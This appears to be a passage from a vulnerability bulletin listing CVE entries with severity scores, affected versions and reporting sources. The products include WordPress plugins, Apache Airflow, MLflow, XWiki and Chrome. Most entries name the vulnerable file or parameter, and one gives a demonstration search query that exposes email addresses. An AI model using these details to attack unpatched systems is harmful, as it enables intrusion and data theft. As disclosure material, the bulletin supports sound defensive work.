wordpress -- wordpressImproper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Aerin Loan Repayment Calculator and Application Form allows Stored XSS. This issue affects Loan Repayment Calculator and Application Form: from n/a through 2.9.3.2023-12-215.9CVE-2023-50829
audit@patchstack.com
wordpress -- wordpressImproper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Seosbg Seos Contact Form allows Stored XSS. This issue affects Seos Contact Form: from n/a through 1.8.0.2023-12-215.9CVE-2023-50830
audit@patchstack.com
wordpress -- wordpressImproper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Mondula GmbH Multi Step Form allows Stored XSS. This issue affects Multi Step Form: from n/a through 1.7.13.2023-12-215.9CVE-2023-50832
audit@patchstack.com
wordpress -- wordpressCross-Site Request Forgery (CSRF) vulnerability in Praveen Goswami Advanced Category Template. This issue affects Advanced Category Template: from n/a through 0.1.2023-12-195.4CVE-2023-50835
audit@patchstack.com
wordpress -- wordpressThe Image horizontal reel scroll slideshow plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'ihrss-gallery' shortcode in versions up to, and including, 13.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.2023-12-195.4CVE-2023-5413
security@wordfence.com
security@wordfence.com
security@wordfence.com
wordpress -- wordpressThe Jquery news ticker plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'jquery-news-ticker' shortcode in versions up to, and including, 3.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.2023-12-195.4CVE-2023-5432
security@wordfence.com
security@wordfence.com
security@wordfence.com
wordpress -- wordpressThe Quttera Web Malware Scanner WordPress plugin before 3.4.2.1 doesn't restrict access to detailed scan logs, which allows a malicious actor to discover local paths and portions of the site's code2023-12-185.3CVE-2023-6065
contact@wpscan.com
contact@wpscan.com
wordpress -- wordpressThe WP Shortcodes Plugin - Shortcodes Ultimate plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'su_button', 'su_members', and 'su_tabs' shortcodes in all versions up to, and including, 7.0.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.2023-12-195.4CVE-2023-6488
security@wordfence.com
security@wordfence.com
security@wordfence.com
wordpress -- wordpressAuthorization Bypass Through User-Controlled Key vulnerability in XWP Stream. This issue affects Stream: from n/a through 3.9.2.2023-12-194.3CVE-2022-43450
audit@patchstack.com
wordpress -- wordpressDeserialization of Untrusted Data vulnerability in weDevs Dokan - Best WooCommerce Multivendor Marketplace Solution - Build Your Own Amazon, eBay, Etsy. This issue affects Dokan - Best WooCommerce Multivendor Marketplace Solution - Build Your Own Amazon, eBay, Etsy: from n/a through 3.7.19.2023-12-194.4CVE-2023-34382
audit@patchstack.com
wordpress -- wordpressURL Redirection to Untrusted Site ('Open Redirect') vulnerability in Parcel Pro. This issue affects Parcel Pro: from n/a through 1.6.11.2023-12-194.7CVE-2023-46624
audit@patchstack.com
wordpress -- wordpressImproper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Ternstyle LLC Automatic Youtube Video Posts Plugin allows Stored XSS. This issue affects Automatic Youtube Video Posts Plugin: from n/a through 5.2.2.2023-12-154.8CVE-2023-49180
audit@patchstack.com
wordpress -- wordpressImproper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ZealousWeb Track Geolocation Of Users Using Contact Form 7 allows Stored XSS. This issue affects Track Geolocation Of Users Using Contact Form 7: from n/a through 1.4.2023-12-154.8CVE-2023-49188
audit@patchstack.com
wordpress -- wordpressImproper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Getsocial, S.A. Social Share Buttons & Analytics Plugin - GetSocial.Io allows Stored XSS. This issue affects Social Share Buttons & Analytics Plugin - GetSocial.Io: from n/a through 4.3.12.2023-12-154.8CVE-2023-49189
audit@patchstack.com
wordpress -- wordpressImproper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Chandra Shekhar Sahu Site Offline Or Coming Soon Or Maintenance Mode allows Stored XSS. This issue affects Site Offline Or Coming Soon Or Maintenance Mode: from n/a through 1.5.6.2023-12-154.8CVE-2023-49190
audit@patchstack.com
wordpress -- wordpressImproper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Supsystic GDPR Cookie Consent by Supsystic allows Stored XSS. This issue affects GDPR Cookie Consent by Supsystic: from n/a through 2.1.2.2023-12-154.8CVE-2023-49191
audit@patchstack.com
wordpress -- wordpressImproper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Biteship Biteship: Plugin Ongkos Kirim Kurir Instant, Reguler, Kargo allows Stored XSS. This issue affects Biteship: Plugin Ongkos Kirim Kurir Instant, Reguler, Kargo: from n/a through 2.2.24.2023-12-154.8CVE-2023-49767
audit@patchstack.com
wordpress -- wordpressImproper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Themeum Tutor LMS - eLearning and online course solution allows Stored XSS. This issue affects Tutor LMS - eLearning and online course solution: from n/a through 2.2.4.2023-12-154.8CVE-2023-49829
audit@patchstack.com
wordpress -- wordpressThe Autocomplete Location field Contact Form 7 WordPress plugin before 3.0, autocomplete-location-field-contact-form-7-pro WordPress plugin before 2.0 does not sanitize and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)2023-12-184.8CVE-2023-5005
contact@wpscan.com
wordpress -- wordpressThe Swift Performance Lite WordPress plugin before 2.3.6.15 does not prevent users from exporting the plugin's settings, which may include sensitive information such as Cloudflare API tokens.2023-12-184.3CVE-2023-6289
contact@wpscan.com
wordpress -- wordpress
 
Authorization Bypass Through User-Controlled Key vulnerability in Blaz K. Rate my Post - WP Rating System. This issue affects Rate my Post - WP Rating System: from n/a through 3.4.1.2023-12-214.3CVE-2023-49765
audit@patchstack.com
wso2 -- api_managerDue to improper error handling, a REST API resource could expose a server side error containing an internal WSO2 specific package name in the HTTP response.2023-12-155.3CVE-2023-6839
ed10eef1-636d-4fbe-9993-6890dfa878f8
wso2 -- api_manager/iot_serverMultiple WSO2 products have been identified as vulnerable due to lack of server-side input validation in the Forum feature, API rating could be manipulated.2023-12-154.3CVE-2023-6835
ed10eef1-636d-4fbe-9993-6890dfa878f8
wso2 -- multiple_productsReflected XSS vulnerability can be exploited by tampering a request parameter in Authentication Endpoint. This can be performed in both authenticated and unauthenticated requests.2023-12-156.1CVE-2023-6838
ed10eef1-636d-4fbe-9993-6890dfa878f8
wso2 -- multiple_productsMultiple WSO2 products have been identified as vulnerable due to improper output encoding, a Stored Cross Site Scripting (XSS) attack can be carried out by an attacker injecting a malicious payload into the Registry feature of the Management Console.2023-12-184.8CVE-2023-6911
ed10eef1-636d-4fbe-9993-6890dfa878f8
xwiki -- xwikiXWiki Platform is a generic wiki platform. Prior to versions 14.10.15, 15.5.2, and 15.7-rc-1, the Solr-based search in XWiki discloses the email addresses of users even when obfuscation of email addresses is enabled. To demonstrate the vulnerability, search for `objcontent:email*` using XWiki's regular search interface. This has been fixed in XWiki 14.10.15, 15.5.2 and 15.7RC1 by not indexing email address properties when obfuscation is enabled. There are no known workarounds for this vulnerability.2023-12-155.3CVE-2023-50720
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
yiisoft -- yii2-authclientyii2-authclient is an extension that adds OpenID, OAuth, OAuth2 and OpenId Connect consumers for the Yii framework 2.0. In yii2-authclient prior to version 2.2.15, the Oauth1/2 `state` and OpenID Connect `nonce` is vulnerable for a `timing attack` since it is compared via regular string comparison (instead of `Yii::$app->getSecurity()->compareString()`). Version 2.2.15 contains a patch for the issue. No known workarounds are available.2023-12-226.1CVE-2023-50708
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
yiisoft -- yii2-authclientyii2-authclient is an extension that adds OpenID, OAuth, OAuth2 and OpenId Connect consumers for the Yii framework 2.0. In yii2-authclient prior to version 2.2.15, the Oauth2 PKCE implementation is vulnerable in 2 ways. First, the `authCodeVerifier` should be removed after usage (similar to `authState`). Second, there is a risk for a `downgrade attack` if PKCE is being relied on for CSRF protection. Version 2.2.15 contains a patch for the issue. No known workarounds are available.2023-12-226.8CVE-2023-50714
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com

Back to top

 

Low Vulnerabilities

Primary
Vendor -- Product
DescriptionPublishedCVSS ScoreSource & Patch Info
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by an Improper Input Validation vulnerability. A low-privileged attacker could leverage this vulnerability to achieve a low-integrity impact within the application. Exploitation of this issue requires user interaction.2023-12-153.5CVE-2023-48608
psirt@adobe.com
automad -- automad
 
A vulnerability was found in automad up to 1.10.9 and classified as problematic. Affected by this issue is some unknown functionality of the file packages\standard\templates\post.php of the component Setting Handler. The manipulation of the argument sitename leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-248684. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.2023-12-212.4CVE-2023-7035
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
code-projects -- faculty_management_systemA vulnerability, which was classified as problematic, has been found in code-projects Faculty Management System 1.0. Affected by this issue is some unknown functionality of the file /admin/pages/yearlevel.php. The manipulation of the argument Year Level/Section leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-248744.2023-12-223.5CVE-2023-7057
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
code-projects -- faculty_management_systemA vulnerability classified as problematic was found in code-projects Faculty Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /admin/pages/subjects.php. The manipulation of the argument Description/Units leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-248743.2023-12-222.4CVE-2023-7056
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
code-projects -- point_of_sales_and_inventory_management_systemA vulnerability was found in code-projects Point of Sales and Inventory Management System 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file /main/checkout.php. The manipulation of the argument pt leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-248846 is the identifier assigned to this vulnerability.2023-12-223.5CVE-2023-7075
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
enterprise_server -- enterprise_serverA race condition in GitHub Enterprise Server allowed an existing admin to maintain permissions on transferred repositories by making a GraphQL mutation to alter repository permissions during the transfer. This vulnerability affected GitHub Enterprise Server version 3.8.0 and above and was fixed in version 3.8.12, 3.9.7, 3.10.4, and 3.11.1.2023-12-213.9CVE-2023-6690
product-cna@github.com
product-cna@github.com
product-cna@github.com
product-cna@github.com
enterprise_server -- enterprise_serverAn incorrect authorization vulnerability was identified in GitHub Enterprise Server that allowed issue comments to be read with an improperly scoped token. This vulnerability affected all versions of GitHub Enterprise Server since 3.7 and was fixed in version 3.17.19, 3.8.12, 3.9.7, 3.10.4, and 3.11.1. 2023-12-212.7CVE-2023-51380
product-cna@github.com
product-cna@github.com
product-cna@github.com
product-cna@github.com
product-cna@github.com
gallagher -- controller_6000Sensitive information uncleared after debug/power state transition in the Controller 6000 could be abused by an attacker with knowledge of the Controller's default diagnostic password and physical access to the Controller to view its configuration through the diagnostic web pages. This issue affects: Gallagher Controller 6000 8.70 prior to vCR8.70.231204a (distributed in 8.70.2375 (MR5)), v8.60 or earlier.2023-12-182.4CVE-2023-41967
disclosures@gallagher.com
gallagher -- multiple_productsImproper input validation of a large HTTP request in the Controller 6000 and Controller 7000 optional diagnostic web interface (Port 80) can be used to perform a Denial of Service of the diagnostic web interface. This issue affects: Gallagher Controller 6000 and 7000 8.90 prior to vCR8.90.231204a (distributed in 8.90.1620 (MR2)), 8.80 prior to vCR8.80.231204a (distributed in 8.80.1369 (MR3)), 8.70 prior to vCR8.70.231204a (distributed in 8.70.2375 (MR5)), 8.60 prior to vCR8.60.231116a (distributed in 8.60.2550 (MR7)), all versions of 8.50 and prior.2023-12-183.1CVE-2023-22439
disclosures@gallagher.com
gitlab -- gitlabAn issue has been discovered in GitLab EE affecting all versions starting from 8.17 before 16.4.4, all versions starting from 16.5 before 16.5.4, all versions starting from 16.6 before 16.6.2. It was possible for auditor users to fork and submit merge requests to private projects they're not a member of.2023-12-153.5CVE-2023-3511
cve@gitlab.com
cve@gitlab.com
keycloak -- keycloakKeycloak's device authorization grant does not correctly validate the device code and client ID. An attacker client could abuse the missing validation to spoof a client consent request and trick an authorization admin into granting consent to a malicious OAuth client or possible unauthorized access to an existing OAuth client.2023-12-213.5CVE-2023-2585
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
libssh -- libsshA flaw was found in the libssh implements abstract layer for message digest (MD) operations implemented by different supported crypto backends. The return values from these were not properly checked, which could cause low-memory situations failures, NULL dereferences, crashes, or usage of the uninitialized memory as an input for the KDF. In this case, non-matching keys will result in decryption/integrity failures, terminating the connection.2023-12-193.7CVE-2023-6918
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
nautobot -- nautobotNautobot is a Network Source of Truth and Network Automation Platform built as a web application atop the Django Python framework with a PostgreSQL or MySQL database. When submitting a Job to run via a Job Button, only the model-level `extras.run_job` permission is checked (i.e., does the user have permission to run Jobs in general). Object-level permissions (i.e., does the user have permission to run this specific Job?) are not enforced by the URL/view used in this case. A user with permissions to run even a single Job can actually run all configured JobButton Jobs. Fix will be available in Nautobot 1.6.8 and 2.1.02023-12-223.5CVE-2023-51649
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
nextcloud -- security-advisoriesNextcloud/Cloud is a calendar app for Nextcloud. An attacker can gain access to stacktrace and internal paths of the server when generating an exception while editing a calendar appointment. It is recommended that the Nextcloud Calendar app is upgraded to 4.5.32023-12-223.5CVE-2023-48308
security-advisories@github.com
security-advisories@github.com
phpgurukul -- online_notes_sharing_systemA vulnerability has been found in PHPGurukul Online Notes Sharing System 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file user/profile.php. The manipulation of the argument name/email leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-248737 was assigned to this vulnerability.2023-12-213.5CVE-2023-7050
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
phpgurukul -- online_notes_sharing_systemA vulnerability was found in PHPGurukul Online Notes Sharing System 1.0. It has been declared as problematic. This vulnerability affects unknown code of the file /user/signup.php. The manipulation leads to weak password requirements. The attack can be initiated remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-248740.2023-12-223.1CVE-2023-7053
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
slawkens -- myaacA vulnerability was found in slawkens MyAAC up to 0.8.13. It has been declared as problematic. This vulnerability affects unknown code of the file system/pages/bugtracker.php. The manipulation of the argument bug[2]['subject']/bug[2]['text']/report['subject'] leads to cross site scripting. The attack can be initiated remotely. Upgrading to version 0.8.14 is able to address this issue. The name of the patch is 83a91ec540072d319dd338abff45f8d5ebf48190. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-248848.2023-12-223.5CVE-2023-7076
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
sourcecodester -- online_student_management_systemA vulnerability has been found in SourceCodester Online Student Management System 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file edit-student-detail.php. The manipulation of the argument notmsg leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-248377 was assigned to this vulnerability.2023-12-192.4CVE-2023-6945
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
sourcecodester -- school_visitor_log_e-bookA vulnerability was found in SourceCodester School Visitor Log e-Book 1.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the file log-book.php. The manipulation of the argument Full Name leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-248750 is the identifier assigned to this vulnerability.2023-12-223.5CVE-2023-7059
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
w3c -- online-spellchecker-pyA vulnerability was found in w3c online-spellchecker-py up to 20140130. It has been rated as problematic. This issue affects some unknown processing of the file spellchecker. The manipulation leads to cross site scripting. The attack may be initiated remotely. The complexity of an attack is rather high. The exploitation is known to be difficult. The identifier of the patch is d6c21fd8187c5db2a50425ff80694149e75d722e. It is recommended to apply a patch to fix this issue. The identifier VDB-248849 was assigned to this vulnerability.2023-12-233.1CVE-2014-125108
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
wordpress -- wordpressTime-of-check Time-of-use (TOCTOU) Race Condition vulnerability in Ricard Torres Thumbs Rating. This issue affects Thumbs Rating: from n/a through 5.0.0.2023-12-193.7CVE-2022-45809
audit@patchstack.com
wordpress -- wordpress
 
Authorization Bypass Through User-Controlled Key vulnerability in gVectors Team Comments - wpDiscuz. This issue affects Comments - wpDiscuz: from n/a through 7.6.3.2023-12-202.7CVE-2023-46311
audit@patchstack.com

Back to top

 

Severity Not Yet Assigned

Primary
Vendor -- Product
DescriptionPublishedCVSS ScoreSource & Patch Info
apache -- airflowApache Airflow, versions 2.6.0 through 2.7.3 has a stored XSS vulnerability that allows a DAG author to add an unbounded and not-sanitized javascript in the parameter description field of the DAG. This Javascript can be executed on the client side of any of the user who looks at the tasks in the browser sandbox. While this issue does not allow to exit the browser sandbox or manipulation of the server-side data - more than the DAG author already has, it allows to modify what the user looking at the DAG details sees in the browser - which opens up all kinds of possibilities of misleading other users. Users of Apache Airflow are recommended to upgrade to version 2.8.0 or newer to mitigate the risk associated with this vulnerability2023-12-21not yet calculatedCVE-2023-47265
security@apache.org
security@apache.org
security@apache.org
apache -- airflowApache Airflow, in versions prior to 2.8.0, contains a security vulnerability that allows an authenticated user with limited access to some DAGs, to craft a request that could give the user write access to various DAG resources for DAGs that the user had no access to, thus, enabling the user to clear DAGs they shouldn't. This is a missing fix for CVE-2023-42792 in Apache Airflow 2.7.2  Users of Apache Airflow are strongly advised to upgrade to version 2.8.0 or newer to mitigate the risk associated with this vulnerability.2023-12-21not yet calculatedCVE-2023-48291
security@apache.org
security@apache.org
security@apache.org
apache -- airflowApache Airflow, version 2.7.0 through 2.7.3, has a vulnerability that allows an attacker to trigger a DAG in a GET request without CSRF validation. As a result, it was possible for a malicious website opened in the same browser - by the user who also had Airflow UI opened - to trigger the execution of DAGs without the user's consent. Users are advised to upgrade to version 2.8.0 or later which is not affected2023-12-21not yet calculatedCVE-2023-49920
security@apache.org
security@apache.org
security@apache.org
apache -- iotdbDeserialization of Untrusted Data vulnerability in Apache IoTDB. This issue affects Apache IoTDB: from 0.13.0 through 0.13.4. Users are recommended to upgrade to version 1.2.2, which fixes the issue.2023-12-21not yet calculatedCVE-2023-51656
security@apache.org
security@apache.org
apache -- airflowApache Airflow, versions before 2.8.0, is affected by a vulnerability that allows an authenticated user without the variable edit permission, to update a variable. This flaw compromises the integrity of variable management, potentially leading to unauthorized data modification. Users are recommended to upgrade to 2.8.0, which fixes this issue2023-12-21not yet calculatedCVE-2023-50783
security@apache.org
security@apache.org
security@apache.org
apple -- macosA session rendering issue was addressed with improved session tracking. This issue is fixed in macOS Sonoma 14.2.1. A user who shares their screen may unintentionally share the incorrect content.2023-12-19not yet calculatedCVE-2023-42940
product-security@apple.com
product-security@apple.com
array -- arrayos_agMotionPro in Array ArrayOS AG before 9.4.0.505 on AG and vxAG allows remote command execution via crafted packets. AG and vxAG 9.3.0.259.x are unaffected.2023-12-22not yet calculatedCVE-2023-51707
cve@mitre.org
assetwise_integrity_information_server -- assetwise_integrity_information_serverBentley eB System Management Console applications within Assetwise Integrity Information Server allow an unauthenticated user to view configuration options via a crafted request, leading to information disclosure. This affects eB System management Console before 23.00.02.03 and Assetwise ALIM For Transportation before 23.00.01.25.2023-12-22not yet calculatedCVE-2023-51708
cve@mitre.org
bcoin-org -- bcoinAn issue was discovered in bcoin-org bcoin version 2.2.0, allows remote attackers to obtain sensitive information via weak hashing algorithms in the component \vendor\faye-websocket.js.2023-12-21not yet calculatedCVE-2023-50475
cve@mitre.org
cve@mitre.org
blinksocks -- blinksocksAn issue was discovered in blinksocks version 3.3.8, allows remote attackers to obtain sensitive information via weak encryption algorithms in the component /presets/ssr-auth-chain.js.2023-12-21not yet calculatedCVE-2023-50481
cve@mitre.org
cve@mitre.org
buildkite -- elastic_ci_for_awsA symbolic link following vulnerability in Buildkite Elastic CI for AWS versions prior to 6.7.1 and 5.22.5 allows the buildkite-agent user to change ownership of arbitrary directories via the PIPELINE_PATH variable in the fix-buildkite-agent-builds-permissions script.2023-12-22not yet calculatedCVE-2023-43116
cve@mitre.org
buildkite -- elastic_ci_for_awsA time-of-check-time-of-use race condition vulnerability in Buildkite Elastic CI for AWS versions prior to 6.7.1 and 5.22.5 allows the buildkite-agent user to bypass a symbolic link check for the PIPELINE_PATH variable in the fix-buildkite-agent-builds-permissions script.2023-12-22not yet calculatedCVE-2023-43741
cve@mitre.org
cacti -- cactiReflected Cross Site Scripting (XSS) vulnerability in Cacti v1.2.25, allows remote attackers to escalate privileges when uploading an xml template file via templates_import.php.2023-12-22not yet calculatedCVE-2023-50569
cve@mitre.org
cve@mitre.org
cams_biometrics -- multiple_productsSQL injection vulnerability in Cams Biometrics Zkteco, eSSL, Cams Biometrics Integration Module with HR Attendance (aka odoo-biometric-attendance) v. 13.0 through 16.0.1 allows a remote attacker to execute arbitrary code and to gain privileges via the db parameter in the controllers/controllers.py component.2023-12-15not yet calculatedCVE-2023-48050
cve@mitre.org
cesanta -- mjsBuffer Overflow vulnerability in Cesanta MJS version 2.22.0, allows attackers to execute arbitrary code, cause a denial of service (Dos), and obtain sensitive information via segmentation fault can occur in getprop_builtin_foreign when input string includes a name of Built-in APIs.2023-12-20not yet calculatedCVE-2023-50044
cve@mitre.org
cve@mitre.org
cryptopp --  cryptoppCrypto++ (aka cryptopp) through 8.9.0 has a Marvin side channel during decryption with PKCS#1 v1.5 padding.2023-12-18not yet calculatedCVE-2023-50979
cve@mitre.org
cryptopp --  cryptoppgf2n.cpp in Crypto++ (aka cryptopp) through 8.9.0 allows attackers to cause a denial of service (application crash) via DER public-key data for an F(2^m) curve, if the degree of each term in the polynomial is not strictly decreasing.2023-12-18not yet calculatedCVE-2023-50980
cve@mitre.org
cryptopp --  cryptoppModularSquareRoot in Crypto++ (aka cryptopp) through 8.9.0 allows attackers to cause a denial of service (infinite loop) via crafted DER public-key data associated with squared odd numbers, such as the square of 268995137513890432434389773128616504853.2023-12-18not yet calculatedCVE-2023-50981
cve@mitre.org
cuppacms -- cuppacmsSQL Injection vulnerability in components/table_manager/html/edit_admin_table.php in CuppaCMS V1.0 allows attackers to run arbitrary SQL commands via the table parameter.2023-12-20not yet calculatedCVE-2023-47990
cve@mitre.org
devolutions -- remote_desktop_managerInadequate validation of permissions when employing remote tools and macros via the context menu within Devolutions Remote Desktop Manager versions 2023.3.31 and earlier permits a user to initiate a connection without proper execution rights via the remote tools feature. This affects only SQL data sources.2023-12-21not yet calculatedCVE-2023-7047
security@devolutions.net
filerun -- filerunFileRun 20220519 allows SQL Injection via the "dir" parameter in a /?module=users&section=cpanel&page=list request.2023-12-22not yet calculatedCVE-2022-47532
cve@mitre.org
free5gc -- free5gcAn issue was discovered in free5GC version 3.3.0, allows remote attackers to execute arbitrary code and cause a denial of service (DoS) on AMF component via crafted NGAP message.2023-12-22not yet calculatedCVE-2023-49391
cve@mitre.org
google -- chromeInsufficient policy enforcement in ADB in Google Chrome on ChromeOS prior to 114.0.5735.90 allowed a local attacker to bypass device policy restrictions via physical access to the device. (Chromium security severity: High)2023-12-20not yet calculatedCVE-2023-3742
chrome-cve-admin@google.com
chrome-cve-admin@google.com
google -- chromeHeap buffer overflow in WebRTC in Google Chrome prior to 120.0.6099.129 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)2023-12-21not yet calculatedCVE-2023-7024
chrome-cve-admin@google.com
chrome-cve-admin@google.com
chrome-cve-admin@google.com
chrome-cve-admin@google.com
chrome-cve-admin@google.com
heimdal -- thor_agentAn issue was discovered in Heimdal Thor agent versions 3.4.2 and before on Windows and 2.6.9 and before on macOS, allows attackers to bypass network filtering, execute arbitrary code, and obtain sensitive information via DarkLayer Guard threat prevention module.2023-12-21not yet calculatedCVE-2023-29485
cve@mitre.org
heimdal -- thor_agentAn issue was discovered in Heimdal Thor agent versions 3.4.2 and before 3.7.0 on Windows, allows attackers to bypass USB access restrictions, execute arbitrary code, and obtain sensitive information via Next-Gen Antivirus component.2023-12-21not yet calculatedCVE-2023-29486
cve@mitre.org
heimdal -- thor_agentAn issue was discovered in Heimdal Thor agent versions 3.4.2 and before on Windows and 2.6.9 and before on macOS, allows attackers to cause a denial of service (DoS) via the Threat To Process Correlation threat prevention module.2023-12-21not yet calculatedCVE-2023-29487
cve@mitre.org
huggingface -- transformersDeserialization of Untrusted Data in GitHub repository huggingface/transformers prior to 4.36.2023-12-19not yet calculatedCVE-2023-6730
security@huntr.dev
security@huntr.dev
huggingface -- transformersDeserialization of Untrusted Data in GitHub repository huggingface/transformers prior to 4.36.2023-12-20not yet calculatedCVE-2023-7018
security@huntr.dev
security@huntr.dev
ivanti -- avalancheAn attacker can send a specially crafted request which could lead to leakage of sensitive data or potentially a resource-based DoS attack.2023-12-19not yet calculatedCVE-2021-22962
support@hackerone.com
ivanti -- avalancheAn unauthenticated attacked could send a specifically crafted web request causing a Server-Side Request Forgery (SSRF) in Ivanti Avalanche Remote Control server.2023-12-19not yet calculatedCVE-2023-46262
support@hackerone.com
ivanti -- avalancheAn attacker can send a specially crafted request which could lead to leakage of sensitive data or potentially a resource-based DoS attack.2023-12-19not yet calculatedCVE-2023-46266
support@hackerone.com
libming -- libmingBuffer Overflow vulnerability in libming version 0.4.8, allows attackers to execute arbitrary code and obtain sensitive information via parser.c component.2023-12-20not yet calculatedCVE-2023-50628
cve@mitre.org
cve@mitre.org
linotp -- linotpDefective request context handling in Self Service in LinOTP 3.x before 3.2.5 allows remote unauthenticated attackers to escalate privileges, thereby allowing them to act as and with the permissions of another user. Attackers must generate repeated API requests to trigger a race condition with concurrent user activity in the self-service portal.2023-12-19not yet calculatedCVE-2023-49706
cve@mitre.org
cve@mitre.org
cve@mitre.org
lockss-daemon -- lockss-daemonlockss-daemon (aka Classic LOCKSS Daemon) before 1.77.3 performs post-Unicode normalization, which may allow bypass of intended access restrictions, such as when U+1FEF is converted to a backtick.2023-12-15not yet calculatedCVE-2023-42183
cve@mitre.org
ltb_self_service_password -- ltb_self_service_passwordAn issue in LTB Self Service Password before v.1.5.4 allows a remote attacker to execute arbitrary code and obtain sensitive information via hijack of the SMS verification code function to arbitrary phone.2023-12-21not yet calculatedCVE-2023-49032
cve@mitre.org
cve@mitre.org
mediawiki -- mediawikiAn issue was discovered in MediaWiki before 1.35.14, 1.36.x through 1.39.x before 1.39.6, and 1.40.x before 1.40.2. In includes/logging/RightsLogFormatter.php, group-*-member messages can result in XSS on Special:log/rights.2023-12-22not yet calculatedCVE-2023-51704
cve@mitre.org
mlflow -- mlflowwith only one user interaction(download a malicious config), attackers can gain full command execution on the victim system.2023-12-19not yet calculatedCVE-2023-6940
security@huntr.dev
security@huntr.dev
mlflow -- mlflowA malicious user could use this issue to access internal HTTP(s) servers and in the worst case (ie: aws instance) it could be abuse to get a remote code execution on the victim machine.2023-12-20not yet calculatedCVE-2023-6974
security@huntr.dev
security@huntr.dev
mlflow -- mlflowA malicious user could use this issue to get command execution on the vulnerable machine and get access to data & models information.2023-12-20not yet calculatedCVE-2023-6975
security@huntr.dev
security@huntr.dev
mlflow -- mlflowThis vulnerability is capable of writing arbitrary files into arbitrary locations on the remote filesystem in the context of the server process.2023-12-20not yet calculatedCVE-2023-6976
security@huntr.dev
security@huntr.dev
mlflow -- mlflowThis vulnerability enables malicious users to read sensitive files on the server.2023-12-20not yet calculatedCVE-2023-6977
security@huntr.dev
security@huntr.dev
mp3gain -- mp3gainA stack buffer overflow vulnerability in MP3Gain v1.6.2 allows an attacker to cause a denial of service via the WriteMP3GainAPETag function at apetag.c:592.2023-12-22not yet calculatedCVE-2023-49356
cve@mitre.org
multiple_vendors -- multiple_productsMatrix SSL 4.x through 4.6.0 and Rambus TLS Toolkit have a length-subtraction integer overflow for Client Hello Pre-Shared Key extension parsing in the TLS 1.3 server. An attacked device calculates an SHA-2 hash over at least 65 KB (in RAM). With a large number of crafted TLS messages, the CPU becomes heavily loaded. This occurs in tls13VerifyBinder and tls13TranscriptHashUpdate.2023-12-22not yet calculatedCVE-2023-24609
cve@mitre.org
cve@mitre.org
nintendo -- dsDS Wireless Communication (DWC) with DWC_VERSION_3 and DWC_VERSION_11 allows remote attackers to execute arbitrary code on a game-playing client's machine via a modified GPCM message.2023-12-20not yet calculatedCVE-2023-45887
cve@mitre.org
cve@mitre.org
nos_client -- nos_clientAn issue was discovered in nos client version 0.6.6, allows remote attackers to escalate privileges via getRPCEndpoint.js.2023-12-21not yet calculatedCVE-2023-50477
cve@mitre.org
cve@mitre.org
